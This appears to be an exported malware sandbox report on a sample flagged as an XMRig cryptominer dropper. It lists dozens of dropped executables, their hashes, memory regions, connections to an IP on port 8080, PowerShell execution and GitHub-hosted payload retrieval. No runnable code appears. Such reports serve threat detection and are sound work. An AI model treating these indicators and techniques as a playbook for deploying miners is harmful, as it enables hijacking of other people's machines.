C:\Windows\System\zZwGzpM.exe

C:\Windows\System\WtTQsIc.exe

C:\Windows\System\WtTQsIc.exe

C:\Windows\System\ffrPniF.exe

C:\Windows\System\ffrPniF.exe

C:\Windows\System\ewOsjFs.exe

C:\Windows\System\ewOsjFs.exe

C:\Windows\System\RXMaSZi.exe

C:\Windows\System\RXMaSZi.exe

C:\Windows\System\XqcSfRz.exe

C:\Windows\System\XqcSfRz.exe

C:\Windows\System\DzjDNIs.exe

C:\Windows\System\DzjDNIs.exe

C:\Windows\System\XsAiVLq.exe

C:\Windows\System\XsAiVLq.exe

C:\Windows\System\TtsHuiV.exe

C:\Windows\System\TtsHuiV.exe

C:\Windows\System\dsKcUrL.exe

C:\Windows\System\dsKcUrL.exe

C:\Windows\System\FqHwMNK.exe

C:\Windows\System\FqHwMNK.exe

C:\Windows\System\wmcvyxR.exe

C:\Windows\System\wmcvyxR.exe

C:\Windows\System\RhSumGM.exe

C:\Windows\System\RhSumGM.exe

C:\Windows\System\jGhEAYa.exe

C:\Windows\System\jGhEAYa.exe

C:\Windows\System\ioErjYt.exe

C:\Windows\System\ioErjYt.exe

C:\Windows\System\XlgTtiQ.exe

C:\Windows\System\XlgTtiQ.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2084-1-0x000000013F930000-0x000000013FD26000-memory.dmp

memory/2084-0-0x00000000000F0000-0x0000000000100000-memory.dmp

\Windows\system\DZrKkAd.exe

MD5 7123e901b3b25cb81b7c643cf59cef90
SHA1 6c05b1fb11f2e704c9ae41cf961193823e4e8ab1
SHA256 c9f9fa997da016b5e291971fb9ad5ca4aa425d69455330ca6d0a2ac815865c4a
SHA512 a227e744670d39e9d2884d50cc9332b93bd1b629246b59eaddada1bb50f84893116386a1179b91076e1dd78a2b7ad29697a3bb8f3a031930d173fd6d2f1bf662

\Windows\system\QNqTcCI.exe

MD5 a5a603acd6ab5d23200e19972e7d8bb6
SHA1 dbd273acc966b89bda62e038d5b2441f42d0e364
SHA256 9d4aa8c3000ba0931a6aab13b63972dbeda7bcceeced336eafd543ccded46d8e
SHA512 e436d9c3a635f4a928a2bd5d1b704889bec32c38829446f7ab38e7474e87deb16e7298656933da1825a3de130765ca12e5c3b39d8faf0cc568cc045eefe24b75

C:\Windows\system\JuSnDLj.exe

MD5 fe2d5dd83884fd8020b4059118fcb793
SHA1 691db3aa7b3dbfe35843de43176dd94e31d1000b
SHA256 e378f45eeebea4e97960df32a88e58e3c37517aaf41342faeac0c084fe78e054
SHA512 e007b8b4cd8884889c0cf3333a069462a3a462de3ae0a29088427b08532389a86667c52be9fde4b7f6c5de5144819c64c9978be988202efaf83944416039a1f3

memory/2704-20-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2084-22-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2680-23-0x000000013F2A0000-0x000000013F696000-memory.dmp

\Windows\system\YIipYkp.exe

MD5 1d152ceebcd7229c21b2ae3aa3bc894e
SHA1 908364fa95c5ae2eb69084658ea363f0fb17628d
SHA256 b720d3297a0a71dc11980abfcfcdfb565e38dce792c50b5e6d29472c76c44599
SHA512 e30d93add39ef291c4307d3064a5647996abe4b9e96d5a6cd14aac49cf3a5ecd8151216519282bb0c8a993cf7a260db0cbd73ff001f3ce30b276bbd32dea2efc

memory/2084-29-0x000000013F300000-0x000000013F6F6000-memory.dmp

memory/2084-18-0x000000013F2A0000-0x000000013F696000-memory.dmp

memory/2632-16-0x000000013F260000-0x000000013F656000-memory.dmp

memory/2084-8-0x000000013F260000-0x000000013F656000-memory.dmp

memory/1336-33-0x000007FEFE5A0000-0x000007FEFE677000-memory.dmp

\Windows\system\eCXrNnn.exe

MD5 3d668f2feda096d060ec5a640f49a91e
SHA1 5e2097252fff4494d1a67abbb28fce2f7813eddc
SHA256 84cf091421e64f33aa48b643501ce62c8d325a9bd502bd06959a68219ad214c3
SHA512 bcd42b3db82a6cbb733aec779ec331c5ffd14654b08f5a642c587db2274ba51ab0dff4c2af03e09831263dba965820b1316096a6c3a2f2ac8ad29db8a6d9be73

memory/2084-40-0x000000013F050000-0x000000013F446000-memory.dmp

memory/2552-41-0x000000013F050000-0x000000013F446000-memory.dmp

\Windows\system\nwhzArH.exe

MD5 53a96c1b69cecbebd5183d90c24e93d4
SHA1 a6b58d8a0243dbdb977127fc67bd137175e12184
SHA256 8d11615af990232f699a5dfcae360a6f3637b0f7998afe69014981ded572124e
SHA512 b96dd923e31e6d7675f05f22ad100ce39bfeb0a42d123245f063118fe7a2e35ac7f1d17f7a669329c69674aa566a45db84a855244a22300c9cfa9f5ae4b959ef

memory/2084-45-0x0000000003650000-0x0000000003A46000-memory.dmp

\Windows\system\AuVxoGG.exe

MD5 b96ca58ca2ed851009a51df884ed0ff5
SHA1 2dcf98fb1a29cab70f783092028bf118ecb0cd0d
SHA256 9ef40d4fc6f55b5275918e83b49be1994c005fe763f3967aa8f4c063f925dd6a
SHA512 d524e7d4bbd79858da78f4756104f36c43b153a9fded57829374a1920af197833001ac7ce6bbcc4f16489991ccbc3e77eca0a6d9b58b9694e27501ffbd20f8f1

\Windows\system\OafXktD.exe

MD5 273ee2b2f78059540773ae0a46c546af
SHA1 5e4391680218c084fe98f082544b268892e793d3
SHA256 380f5a6953b6163de0b26ec8fe5c775330c86bcdb3d489ca635ea252436a89f3
SHA512 927d2e73c83d53c43e098688bbf59bd197cd85913ec5ba8315bd1d5f7f89a5443831f6e514162c51ea75299d6452e61b7548dfe78e125670cc31332a9219b218

memory/2992-47-0x000000013FB20000-0x000000013FF16000-memory.dmp

C:\Windows\system\GZEAeoJ.exe

MD5 fad95de792e06319354b8f736ea167f1
SHA1 6555986b861e846858374fdd78c3eac87479cdd1
SHA256 28249a48013fbeaccb73a03b653511ba13853243622165acd383e92a0fa943c2
SHA512 56831303811fe320eb79a3b28bd875e757aa75873b5d25add06d9c88ffa9932a19338cdc3f1f2f8116d3466b8ec6e10f618059479a83a75a7322175bd82854ab

C:\Windows\system\SRlwNSr.exe

MD5 9cfa0ac4cba912d7b9e50f5fe99def71
SHA1 7e55c456d183a989bc811081af019b35915d66a8
SHA256 ce1b2abac0fd63abf60cb9d9259cb5923b70b3f0a2dd777a76aa9de6f85850f8
SHA512 ebbd0a29e74e2392d983d578b5266a57ad125b65ff51a54aa429266628a04d9ab692a2fc7b76eec7fcac26410d717e1f38a7784082f4b1d71adc7e98f11ca6a1

memory/1632-85-0x000000013F210000-0x000000013F606000-memory.dmp

memory/1764-93-0x000000013F840000-0x000000013FC36000-memory.dmp

C:\Windows\system\pubthri.exe

MD5 2de0df062b4fa08b73e18632355b6c77
SHA1 9c9111edf2a26776123e0b38c88fedeffb44a7bb
SHA256 41a2e4f37cbef6b1ef62f80fd0560d476c112415bc160f3e32e68a77d560b52a
SHA512 45adc233b67c9a5905cc2a80a28ada85be9a889d6b10b63f7c0b97d684f3b82d5b59af5bc1c9e39d23e3c674cca74b0a5a975cfec4c53a2298e7d7fd4fcbd381

C:\Windows\system\lbVdRxA.exe

MD5 9104d72f319f87dfb6e5fe1f104a38d8
SHA1 05b85a85de9520bf672aaa28f15d2e5c3fb3ac49
SHA256 f2f1898e7569ba4787634d0ca4e13e13fa9fd28d52658a61f66f731bdd5222f0
SHA512 298dc118eb29f070eb22042b723b4279afe1ab190e3391e9f75acb13e9ed7c560363751aae76b30cbdeee056c21c7fc91459db6f139a3df61f877ed54bde4cb3

memory/2504-2375-0x000000013FA40000-0x000000013FE36000-memory.dmp

memory/2084-2370-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/2992-2363-0x000000013FB20000-0x000000013FF16000-memory.dmp

memory/2084-1549-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/1336-1550-0x000007FEFE5A0000-0x000007FEFE677000-memory.dmp

C:\Windows\system\eWpZtqO.exe

MD5 86d40f9966b89b6999c662530920ab0e
SHA1 c2e7b36a645367769596f86e1753549c73f040ba
SHA256 2fdfd0e9122359905cd7c831b9c7276e0ba13ea82f47b956990956384d9a35ce
SHA512 e6bb3f85fdc77ae79e9973956cc18a37b9d3fa24db75a59e4020b31ceb34e5c3e08e3e6c51b32803edac0b572b8d744faf7b8c82d81f99582378b65943ee91f8

C:\Windows\system\cvgkOgm.exe

MD5 51cedd8f52de83169bf7f3829a4d02c1
SHA1 5e25c32e1f59290615c228d981d2e008b5fd6732
SHA256 c4365d55fb8843d1477f26f43b04fa0d79fe3544601dbf9154bc00f7f32595d2
SHA512 14bb1a234b8a3c689e2daadaf0ab72f80f629540a017ce043ea7a2594e4ce157ef8c1d7b20472f2430303b65748fe60432ce78cc8fc59e58b42b5d26a3f24d4e

C:\Windows\system\TQAkVdR.exe

MD5 32f70262efc6da59f9d290f547b6036e
SHA1 fda1e3bd7ba44f723e839a23c7bd1f24d53f3dc3
SHA256 3dc540ec69de5914c923b0545517dc7369c10507eaa9ab99b5d80a65822a9b16
SHA512 1b3e423ec511e993dba08f29a44f06c5a233b4b95106dae70eec59ad08a7404900740da9c9a13ca9f30c8e7ab7de1a49b87ab612ede90539e79b9a1d505a4098

C:\Windows\system\AlqyhVN.exe

MD5 6a6eea1bb87826ccd049de90ff849cbc
SHA1 5877565eb9d13e319d22c4360c75df8657f3faf6
SHA256 07f0be59f2b43c985cf0382ba186c6085ff8eddb932aa518220fb3a6263b8674
SHA512 a39721d09adc51775d11b5d65d8de93877e7e400de560a8a13548254df84817a34de26a67198269b3ba86648c6fa9b20635d702259bb15ec62a410caa2e834c2

C:\Windows\system\LlqgRTd.exe

MD5 53889a156f863d2bee5645633a1016f7
SHA1 fd56f8a5e97c1d78f095e9ff66f50dfccc502c90
SHA256 83474bc61267af78d5af1c138b1dae6c898bcfb4a225e91a7bb339f98893986e
SHA512 201159ed54e420f92f7768fcae21fb4c1333a4e025fb40d5e23e27e0d5165dd695004af6383ba01246db64c933fa4046f1706a3f0967592a700a2b28ba675019

C:\Windows\system\wKWjoZl.exe

MD5 a9c4178b4082dd1e904a07ad233eb9d2
SHA1 237cc4553df6ad53e15f749e6a2671e8a965a92c
SHA256 8067cd116e58432ae750b7922b03210b6038961e0d7e7f7b6b623a92402ea1a3
SHA512 b2f0cb2d8b9a08c614abe2c92e832b54c35c37a033bad3d632331c489c0b8953db94a35b2a4a079d44a547ca287c86be3814a82ac7644346c3285d603b0baeca

C:\Windows\system\WxqJLut.exe

MD5 204dd3711ba6caa2e908ea9bfc00931f
SHA1 bda297891c8b647868f7447bf7252f3bd2b0ef37
SHA256 c9f422d4a71255fe78d71f21929f20c52314e3422ed8ded286b85395af10b8c7
SHA512 5a09c14eb0b3a3d40b6a8890108de7fe6473207b75b34209398c786fa675af9dfbccfb147121e51ea7b770ab287d1df8c19620ab02d7b481c7c7d6d0aec64dae

C:\Windows\system\dqhsYFV.exe

MD5 6f2516d9451ef8c5abacfeb052dc1c17
SHA1 7c664e77854fa35f55f295a61d093075902a3dee
SHA256 bfb3b3b8e10050f3ef7b551672f8e1b1a6a7624fb8476035a8549817ceb0654a
SHA512 0e050bb82a7c9049c3aeca767ff0dac562bc830937d864eb91a5866541c717546cccfbab9bce3925bbc2d043d3342fda101349fc5121be7cf8cc08721a0518c5

C:\Windows\system\labQVpR.exe

MD5 49e5df315c54e0d4bdeecb9e90a54ae1
SHA1 ab4defadb4774e88b7d7c2f64a0bd10d0722f74b
SHA256 d71f514a0f8fd2be6fde5a31615fa1c512796963fc32e2e57409b836551c693e
SHA512 9b9adceb7b9f5235eaf867e9738e475b2d2fddb371a3c7a6f763c0dcd78dcfa147913fabba6490ca92d7b7658fc63efc171bb0d5fa9df2704b5d0d1daef3b3db

C:\Windows\system\DyIbAXX.exe

MD5 8d5899dc921b61ef25672bef44cc1e2e
SHA1 b274eccafbd34deb436099826df261838c8e2e35
SHA256 fa2d11485fec47370324404ceea485cfd821d27e00e974334262aa0ba00c9d40
SHA512 1ea6e4328933c609218bbca0d28a2547791caa5815e4353d9d3bc7c24ff95c2bb4ced5ffd6c2fde9b59dfc507a3a177fc328126f1f66aeacc9bd240b89809715

C:\Windows\system\XCBqqjh.exe

MD5 4826473a7504964a6ccc40d238135214
SHA1 4d31375e34e3299f2860a1e664b9f7788876cd59
SHA256 e3624c47c3c806ee92d32a4c7a25d3aee83bd41ebc0e85724bed708ad60b4683
SHA512 cb269dce16eef9c4211f4602e7c20ea936b63077f674ca8665b30a53de1235786e27c4997bbe99e3606017fc48ebf1b3bffd1743dbbe62d824ec660c7ca1751a

C:\Windows\system\QCKnUPl.exe

MD5 f058ceebb9b080f7c5655705f1bc71e2
SHA1 9779ce6fa28956cf9c1e86f7d0bbc5847ea45118
SHA256 0cbfce9924fa77a98ff8405b4e40a69bc71b806f9b41de15f3af9778e44fb0f3
SHA512 30d1f3c2e444ba48605a87b219858233988e1844b142711afc19cf72d7a5cf7f5e675a30986a986146f7d6c5b017bd4082b99b43b3bc8396310e822cfabb492d

C:\Windows\system\UOAriZO.exe

MD5 db6956c920fba3c18200e19b1045ae43
SHA1 97465c48c49c49905773ae4cbb25df6e8095cfe9
SHA256 ebb39e8354dd9177f775f665c70706dc8304b3fd0199f74a84da25c27e194ae0
SHA512 593284d3338e8653e4c0280b4e3fec8a3c616e88da4e60aaf40950efeec429ac809e8bef8e3ac4ad4c9c5f4ab335a5c11cc722912722a368d7bc5838171c6b13

C:\Windows\system\AhAIcat.exe

MD5 0a75e92c5d59a3b701b4be080fdb4ea4
SHA1 dcdf207f907d70dc08881774faa0c9431904585e
SHA256 f600dc058e47efe30ff3ba12c34739a204a56e0861c5e64fc931a82c2a9f34e6
SHA512 049903bbb59535c78d1a32be466f3cf63ca6faf3c5c37dbe28216dc17886c27f60cb92ff774aaa945ff7ab19f548c199e8d48fb7356b0f38b9d08d431d47c8a3

C:\Windows\system\QNbfdYp.exe

MD5 deca04eb581cdf87cbd5bf8fbad7cbdf
SHA1 c2683b177c5588de151e0a22ff056410eb57330f
SHA256 e9ccb38b43a1aafd362893f0fdc54332da7dfdd5e30129d58e5315356a8d5994
SHA512 91dde990fcafc9717f7ae3b8afa311fb0183d2b43ada7ec74a285a058d5d134f9a1892c5fd52c5e5a51e9b1465a6e67616e964da5d214c3cb308107ac5510d77

C:\Windows\system\KJiXiIS.exe

MD5 824b2d62de3d4418a244d73947b9366a
SHA1 c4b90d5c421cc5a2a138419d894927abe9f4bb52
SHA256 332c6a848bb8ade7eb488f80acea2da5966fadaaa4653af919e8f3c3703907af
SHA512 3dabeac8e7901fc6803842b9eb6e00fa246434a5a97a7d84330068341abd4f69b9118282b3d1ae50ea3c0a0468e28f0982eab1ab883f5aaccac664ebf54d0eeb

C:\Windows\system\JbCstti.exe

MD5 8920da6c9f1d2134e28b40eb7a231669
SHA1 ee9078cab18eb96710922cadc8186981200f6075
SHA256 0ed1a509cb2e3ff6529064be0bfd15011da38c0c8228e8767ebf4e7b3b62def7
SHA512 6676bfc4c4e6ecf0f1d65e3f398fe7ad387348486290f12a9336607eb06a5c5661a3cf32f94df3b5928d807f8b1e2f4ae35dc996531808ec58df7aeb18e17c72

memory/2084-91-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/2512-90-0x000000013F300000-0x000000013F6F6000-memory.dmp

C:\Windows\system\oFqPQyK.exe

MD5 9e754690f52b042eddac4b9f37344ea3
SHA1 0ea504cfc4fd92a0b8348f3d5926220a5b402d50
SHA256 9a221ad4c61618d8a78da90cede72d9be4632b7ad4ac11d13cc05ac8bfd98428
SHA512 51bcb8973d97e6a7feedd23b96fb24fb037a7dba8eb061839cf97ee168ae706ae56bf67e9b2eccd14e0d8025df900109464533036ffb78958b8db38430010071

C:\Windows\system\VRgIbfp.exe

MD5 47b567a467174d0c15aea53e02c49c2a
SHA1 ce53f059e1013ee4a192e25ed9807bce88b1ad4c
SHA256 b62213ad97615fbd03c7888fddce7dbdae3bdb430d48692a20deb366c8a645b1
SHA512 1bf3c7dc7170f69dc9a7813b3adaa92b32571f12c1ede03b44f5efed4f69c65f2637637dada58348a7045b08f68319a14b1d707195d18ca5b3c4f67da73aaf6c

memory/2592-76-0x000000013FCF0000-0x00000001400E6000-memory.dmp

memory/1928-75-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

C:\Windows\system\heysZsU.exe

MD5 af10a63973df843c76ab9f9b9eb6135b
SHA1 6fef600b4ffb98f6d4f8a967c1ee19e9f6a73d13
SHA256 1c4f5e07be25cccc0e583083bf9661366ea0ea97560df3287989bfaafd0bd702
SHA512 e44dbc058c37d939d64ba3670d2b2327af2440c67312f3987e1bced120f291c5d70d062d4dcd841567bfbcdd895690c509d85faf6c2f320e536f0df65ac36c93

memory/2792-71-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2084-70-0x000000013F930000-0x000000013FD26000-memory.dmp

memory/2084-68-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

memory/2084-66-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/2084-84-0x000000013F210000-0x000000013F606000-memory.dmp

memory/1336-82-0x0000000002890000-0x0000000002898000-memory.dmp

memory/1336-65-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2504-64-0x000000013FA40000-0x000000013FE36000-memory.dmp

memory/2084-56-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/2084-2563-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/2084-2763-0x0000000003650000-0x0000000003A46000-memory.dmp

memory/1764-5730-0x000000013F840000-0x000000013FC36000-memory.dmp

memory/2680-7516-0x000000013F2A0000-0x000000013F696000-memory.dmp

memory/2552-7946-0x000000013F050000-0x000000013F446000-memory.dmp

memory/2992-7979-0x000000013FB20000-0x000000013FF16000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 07:47

Reported

2024-06-12 07:50

Platform

win10v2004-20240508-en

Max time kernel

144s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\nrEeUQv.exe N/A
N/A N/A C:\Windows\System\aGbHgSz.exe N/A
N/A N/A C:\Windows\System\BtvhkRv.exe N/A
N/A N/A C:\Windows\System\RdaFAwN.exe N/A
N/A N/A C:\Windows\System\wBxbKjx.exe N/A
N/A N/A C:\Windows\System\sVSUdhc.exe N/A
N/A N/A C:\Windows\System\nhbEhwf.exe N/A
N/A N/A C:\Windows\System\NkwjlPj.exe N/A
N/A N/A C:\Windows\System\VudxPFj.exe N/A
N/A N/A C:\Windows\System\JPEdnWE.exe N/A
N/A N/A C:\Windows\System\HBcNeCF.exe N/A
N/A N/A C:\Windows\System\oVLeUIc.exe N/A
N/A N/A C:\Windows\System\SNJvcnq.exe N/A
N/A N/A C:\Windows\System\CQfDRZQ.exe N/A
N/A N/A C:\Windows\System\eBOBADi.exe N/A
N/A N/A C:\Windows\System\ZBtsyTp.exe N/A
N/A N/A C:\Windows\System\QgqHTam.exe N/A
N/A N/A C:\Windows\System\NjPVgJQ.exe N/A
N/A N/A C:\Windows\System\eXrHiiL.exe N/A
N/A N/A C:\Windows\System\JlpOeei.exe N/A
N/A N/A C:\Windows\System\ANSxhHm.exe N/A
N/A N/A C:\Windows\System\DYNggOH.exe N/A
N/A N/A C:\Windows\System\keyCkDc.exe N/A
N/A N/A C:\Windows\System\ZzbheAr.exe N/A
N/A N/A C:\Windows\System\oppyROm.exe N/A
N/A N/A C:\Windows\System\sVhToqU.exe N/A
N/A N/A C:\Windows\System\NKNFxih.exe N/A
N/A N/A C:\Windows\System\IiGRZwU.exe N/A
N/A N/A C:\Windows\System\rfcuMDg.exe N/A
N/A N/A C:\Windows\System\JusZzIE.exe N/A
N/A N/A C:\Windows\System\aYSpnqN.exe N/A
N/A N/A C:\Windows\System\LstzCdJ.exe N/A
N/A N/A C:\Windows\System\wInVkvP.exe N/A
N/A N/A C:\Windows\System\QZPkwWt.exe N/A
N/A N/A C:\Windows\System\jzqtAgN.exe N/A
N/A N/A C:\Windows\System\jPMbBSH.exe N/A
N/A N/A C:\Windows\System\cOYRRog.exe N/A
N/A N/A C:\Windows\System\JidTZOw.exe N/A
N/A N/A C:\Windows\System\vSGYRre.exe N/A
N/A N/A C:\Windows\System\pjyqlML.exe N/A
N/A N/A C:\Windows\System\xxEVweB.exe N/A
N/A N/A C:\Windows\System\xxuRYkD.exe N/A
N/A N/A C:\Windows\System\GJssihl.exe N/A
N/A N/A C:\Windows\System\fRJbBru.exe N/A
N/A N/A C:\Windows\System\dnNqmzc.exe N/A
N/A N/A C:\Windows\System\uFDxQAb.exe N/A
N/A N/A C:\Windows\System\MJYhgEE.exe N/A
N/A N/A C:\Windows\System\nImqGuw.exe N/A
N/A N/A C:\Windows\System\LyLmRkE.exe N/A
N/A N/A C:\Windows\System\fKmQEFc.exe N/A
N/A N/A C:\Windows\System\unaKQSf.exe N/A
N/A N/A C:\Windows\System\mRBRGbp.exe N/A
N/A N/A C:\Windows\System\CGqIbqR.exe N/A
N/A N/A C:\Windows\System\iBBSGie.exe N/A
N/A N/A C:\Windows\System\ndrfnkz.exe N/A
N/A N/A C:\Windows\System\atzsjiv.exe N/A
N/A N/A C:\Windows\System\ASEyKjN.exe N/A
N/A N/A C:\Windows\System\ZmxkzWp.exe N/A
N/A N/A C:\Windows\System\UhqYZTH.exe N/A
N/A N/A C:\Windows\System\abqYkIa.exe N/A
N/A N/A C:\Windows\System\dEFRjnQ.exe N/A
N/A N/A C:\Windows\System\zGFBOqV.exe N/A
N/A N/A C:\Windows\System\eeUHsoz.exe N/A
N/A N/A C:\Windows\System\aUfVASW.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\YUijICH.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tMdWpdW.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rdZddom.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vyxubvr.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QMULHaZ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YbGQZWY.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EHBZNRg.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LnfjNkX.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CEyNwFj.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lzuDJji.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\enexxSY.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tPdXydn.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KzCDpZQ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JjspAIm.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kvEEfnH.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CxJnhnL.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hWPXFVI.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xnAHyKU.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ndMpOFy.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CbFPRTr.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YCzvgCS.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\losqySI.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OmxvQMx.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rpYRiaZ.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rosMENS.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fljmBhE.exe C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe N/A
